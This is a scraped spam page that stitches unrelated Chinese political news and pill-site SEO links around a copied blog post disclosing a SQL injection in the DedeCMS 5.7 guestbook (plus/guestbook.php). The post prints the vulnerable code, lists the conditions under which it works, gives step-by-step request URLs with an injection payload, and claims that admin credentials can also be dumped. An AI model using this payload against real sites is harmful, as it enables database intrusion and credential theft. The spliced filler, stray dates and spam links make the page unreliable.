??? (首发)dedecms 5.7 最新漏洞(绝非网上公布的) - 油郭新闻网 - fuyigan.cn 台中市| 曲江| 胶州| 宝安| 木垒| 麻栗坡| 绥棱| 虎林| 通辽| 鲁山| 监利| 绥中| 科尔沁左翼后旗| 启东| 秋葵官网

热烈祝贺成都大熊猫繁育研究基地成立30周年

2018-05-22 15:49 来源:京华网

  热烈祝贺成都大熊猫繁育研究基地成立30周年

  阿勃威官网Mastip公司是一家总部设在新西兰、专业为全球范围内注射模塑产业提供热流道系统的供应商,目前行业内全球排名前四。2018年全国两会,习近平总书记参加一些代表团的审议、参加政协联组会,同代表委员们真情互动、坦诚交流、共商国是,再一次发出夺取新时代中国特色社会主义伟大胜利的号令。

张军同志当选为中华人民共和国最高人民检察院检察长。同时,台湾老师在大陆任教,可以申请国家社科基金……我们深刻的感受到台湾年轻人到大陆发展幸福指数非常高。

  2017年,我们共举办了2场中国发展论坛,第一场在天津举办,以“共创智能生活·共享健康中国”为主题。郭振华表示,按照法律的有关规定,大会秘书处正在对代表议案逐件进行分析,研究提出初步处理意见,按程序提请大会主席团审议。

  ”李梦桃说,从经济、政治、社会、文化、生态等各个方面,新发展理念正在推动国家一步步向前,我们有了更多获得感、幸福感、安全感。脱贫攻坚民主监督是中共中央赋予民主党派的一项新任务,致公党对口联系四川省,建立联系已有两年了,应该说在脱贫攻坚民主监督方面致公党发挥了应有的作用。

我相信,作为中共中央的领导核心、国家主席、中央军委主席,您将带领中国人民胜利实现把中国建成富强民主文明和谐美丽的社会主义现代化强国目标,为地区乃至世界和平、稳定和繁荣作出重要贡献。

  我确信朝中两国关系将沿着符合两国人民共同利益的方向发展。

  中华文化学院与中央社会主义学院是“一个实体、两块牌子”,主要面向港澳台同胞和海外华人华侨,开展中华文化和国情研修教育。今年是全面贯彻党的十九大精神的开局之年,是改革开放40周年,是决胜全面建成小康社会、实施“十三五”规划承上启下的关键一年。

  党的好政策给我们边疆人民带来了好生活,玉麦乡去年每户人家年收入都超万元,日子过得红红火火。

  在掌声中,新当选的国家副主席王岐山向代表们鞠躬致意。(记者汪俞佳)

  习近平、李克强、栗战书、汪洋、王沪宁、赵乐际、韩正等出席会议。

  阿勃威官网我们通过联系点了解基层情况,及时向中央反映有关情况。

  “宁波帮”人士孙宁初博士穿针引线,最终以“亲情牌”“专业牌”和“服务牌”赢得客商信任,实现项目落地。中共中央政治局常委、全国政协十三届一次会议主席团会议主持人汪洋参加看望和讨论。

  力戈复合片官网 育根一号官网 仙人鞭官网

  热烈祝贺成都大熊猫繁育研究基地成立30周年

 
责编:
?

Dec 26 2012

(首发)dedecms 5.7 最新漏洞(绝非网上公布的)

阿勃威官网 精准指导,形成合力。

首页 » 代码审计 » (首发)dedecms 5.7 最新漏洞(绝非网上公布的)   

请看看文件:include/filter.inc.php

引用一哥话语:

这是2B的dede再次变量覆盖漏洞根源。。

这是过滤或替换非法关键字。正常的。

/* 对_GET,_POST,_COOKIE进行过滤 */
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        ${$_k} = _FilterAll($_k,$_v);
    }
}

等同于重新赋值了,之前做的过滤无效了。
这是过滤或替换非法关键字。正常的。


1.为了有效的防止 传播 转载 公布
2.一些首发漏洞就得设置点权限 自然以后大家都想着升官 这样才能看到更好的贴 自然想升官就得自己先发好贴 这样一来 自然好贴就多了。
不知道有没有道理,反正我是这样觉得的。当然过段时间 会设置成0权限查看。一开始嘛 先让一些发过好贴升官的人看嘛,就象wooyun 先核心看 再普通 在初级的 这样我觉得是更好些 !


漏洞:dedecms 5.7 最新sql漏洞一枚
作者:鬼哥
版权:www.90sec.org

看此贴你需要保证以下几点:
                                        1.保证需要人品好
                                        2.保证不非法利用(只漏洞检测修复 不干坏事)[否则后果自负]
                                        3.绝对保证100%不传播 公开 转载 (如发现:传播 转载 公布)我只能说我会很伤心! 没公开的漏洞能玩就先玩段时间嘛!
                                        4.尊重版权!



漏洞文件edit.inc.php具体代码:<?php

if(!defined('DEDEINC')) exit('Request Error!');

if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
else $GUEST_BOOK_POS = "guestbook.php";

$id = intval($id);
if(empty($job)) $job='view';

if($job=='del' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");
    ShowMsg("成功删除一条留言!", $GUEST_BOOK_POS);
    exit();
}
else if($job=='check' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");
    ShowMsg("成功审核一条留言!", $GUEST_BOOK_POS);
    exit();
}
else if($job=='editok')
{
    $remsg = trim($remsg);
    if($remsg!='')
    {
        //管理员回复不过滤HTML
        if($g_isadmin)
        {
            $msg = "<div class=\\'rebox\\'>".$msg."</div>\n".$remsg;
            //$remsg <br><font color=red>管理员回复:</font>
        }
        else
        {
            $row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");
            $oldmsg = "<div class=\\'rebox\\'>".addslashes($row['msg'])."</div>\n";
            $remsg = trimMsg(cn_substrR($remsg, 1024), 1);
            $msg = $oldmsg.$remsg;
        }
    }
   //这里没有对$msg过滤,导致可以任意注入了
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
    ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS);
    exit();
}

if($g_isadmin)
{
    $row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
}
else
{
    $row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
}


漏洞成功需要条件:
                          1. php magic_quotes_gpc=off
                          2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

怎么判断是否存在漏洞:
                                先打开www.xxx.com/plus/guestbook.php  可以看到别人的留言,
                                然后鼠标放在 [回复/编辑]   上 可以看到别人留言的ID。那么记下ID
                                访问:www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=90sec'&id=存在的留言ID
                                提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
                               跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 90sec' 如果变成了 那么证明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
                               如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。
                               那么再次访问 www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='
                               然后返回,那条留言ID的内容就直接修改成了mysql 的user().

大概利用就是这样,大家有兴趣的多研究下!!

最后补充下,估计有人会说怎么暴管理后台帐户密码,你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)!!

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: dedecms 5.7 dede漏洞 织梦漏洞

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «ECShop V2.7.3 GBK release1106注入0day | emblog 编辑器xss 跨死你无压力»

你肿么看?

你还可以输入 250/250 个字

? 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

已有9条评论

匿名

2018-05-22 17:17 4楼
第一次提交不了,第二次依旧无法修改

mOon

2018-05-22 09:06
@匿名:修补了

匿名

2018-05-22 14:01 地板
晕了~~我的网站就被这个漏洞搞了~~~

mOon

2018-05-22 18:27
@匿名:额

匿名

2018-05-22 20:23
@mOon:我今天看的一个站,过程跟你是一样的,但是没结果。。。。

匿名

2018-05-22 14:32 板凳
研究不来,麻烦说下呗

匿名

2018-05-22 00:04 沙发
傻逼

匿名

2018-05-22 17:19
@匿名:没安装留言板怎么弄

mOon

2018-05-22 18:49
@匿名:没得弄
?
?
筲箕湾镇 千军台坑 坑尾村 环江南道 菜纳乡
云集路 团结瑶族乡 玛艾镇 浮桥 朝阳村
秋葵官网 力戈复合片官网 仙人鞭官网 官网 官网
仙人鞭官网 http://www.damiaom.com/ 秋葵官网 http://www.shumadg.com/ 牡蛎官网 http://www.liugejf.com/ 阿勃威官网 http://www.woniuai.com/ 育根一号官网 http://www.botwifi.com/ 仙人鞭官网 http://www.xinxn.cn/ 秋葵官网 http://www.xanglng.com/ 牡蛎官网 http://www.yaofo.net/ 阿勃威官网 http://www.xngda.com/ 育根一号官网 http://www.xnnda.com/ 参苁草精片官网 http://www.dgmagnet.com.cn/ 阿勃威官网 http://www.zmingh.cn/ 力戈复合片官网 http://www.qyfood.com.cn/ 官网 http://www.mllmr.cn/